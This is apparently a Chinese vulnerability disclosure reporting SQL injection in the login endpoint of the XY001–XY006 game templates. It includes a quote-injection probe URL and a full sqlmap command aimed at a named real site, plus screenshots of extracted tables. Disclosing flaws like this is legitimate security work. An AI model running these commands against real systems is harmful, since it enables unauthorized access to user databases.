### 简要描述:
从XY001到XY006游戏模板均存在此SQL注入
### 详细说明:
游戏模板玩家论坛登录处未正确处理用户输入导致SQL注入:
以其中一个商业游戏模板测试:
```
http://xy006.52xinyou.cn/api/remote/login.ashx?cid=0.3394278590029699&callback=jsonp1389690871382&uid=test%27&pwd=adfadsf&rem=false
```
[<img src="https://images.seebug.org/upload/201401/14172107863fda723245f11e3f261bfd20937c40.jpg" alt="sqltest4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/14172107863fda723245f11e3f261bfd20937c40.jpg)
测试:
```
sqlmap.py -u "http://xy006.52xinyou.cn/api/remote/login.ashx?cid=0.3394278590029699&callback=jsonp1389690871382&uid=test&pwd=adfadsf&rem=false" -p "uid"
```
[<img src="https://images.seebug.org/upload/201401/1417241743fe87b21ca1291f9894e327bc71d3ef.jpg" alt="sqltest4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/1417241743fe87b21ca1291f9894e327bc71d3ef.jpg)
tables:
[<img src="https://images.seebug.org/upload/201401/141727564c0fd9412165724d8e08c290ae2964c3.jpg" alt="sqltest22.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/141727564c0fd9412165724d8e08c290ae2964c3.jpg)
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201401/14172107863fda723245f11e3f261bfd20937c40.jpg" alt="sqltest4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/14172107863fda723245f11e3f261bfd20937c40.jpg)
[<img src="https://images.seebug.org/upload/201401/1417241743fe87b21ca1291f9894e327bc71d3ef.jpg" alt="sqltest4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/1417241743fe87b21ca1291f9894e327bc71d3ef.jpg)
[<img src="https://images.seebug.org/upload/201401/141727564c0fd9412165724d8e08c290ae2964c3.jpg" alt="sqltest22.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/141727564c0fd9412165724d8e08c290ae2964c3.jpg)
暂无评论